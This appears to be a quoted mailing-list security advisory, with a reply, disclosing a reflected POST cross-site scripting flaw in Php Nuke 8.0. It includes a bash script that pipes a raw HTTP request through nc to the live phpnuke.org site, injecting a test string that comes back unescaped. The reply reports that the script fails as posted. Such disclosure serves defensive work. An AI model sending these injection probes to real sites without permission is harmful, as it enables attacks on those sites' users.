ascii wrote:
Php Nuke POST XSS on steroids
Name Php Nuke POST XSS on steroids
Systems Affected PHP >=4.0.7 <=5.2.1, GLOBALS OFF, Php Nuke 8.0 and
others (partially verified)
Severity Medium
Vendor http://php nuke.org/
Advisory http://www.ush.it/2007/03/09/php-nuke-wild-post-xss/
Authors Francesco `ascii` Ongaro (ascii@xxxxxx)
Stefano `wisec` di Paola (stefano.dipaola@xxxxxxxx)
Date 20070307
--- >8 --- >8 --- >8 --- >8 --- testsuite.sh --- >8 --- >8 --- >8 --- >8
#!/bin/bash
cat > REQ << TOKEN
POST /modules.php?name=Downloads&d_op=search&query= HTTP/1.1
Host: www.phpnuke.org
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.2)
Gecko/20070220 Firefox/2.0.0.2
Accept:
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Connection: close
Referer: http://www.phpnuke.org/modules.php?name=Downloads
Cookie: lang=english
Content-Type: application/x-www-form-urlencoded
Content-Length: 23
query=token<>token
TOKEN
cat REQ | nc www.phpnuke.org 80 -vvv
--- >8 --- >8 --- >8 --- >8 --- ------------ --- >8 --- >8 --- >8 --- >8
$ ./testcase | grep "token<>token"
DNS fwd/rev mismatch: www.phpnuke.org != ev1s-67-15-16-43.ev1servers.net
www.phpnuke.org [67.15.16.43] 80 (http) open
<form
action="modules.php?name=Downloads&d_op=search&query=token<>toke
Regards,
Francesco `ascii` Ongaro
http://www.ush.it/
I tried both your scripts at a few locations, and all I get back is this:
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>400 Bad Request</title>
</head><body>
<h1>Bad Request</h1>
<p>Your browser sent a request that this server could not understand.<br />
Request header field is missing ':' separator.<br />
<pre>
Gecko/20070220 Firefox/2.0.0.2</pre>
</p>
</body></html>
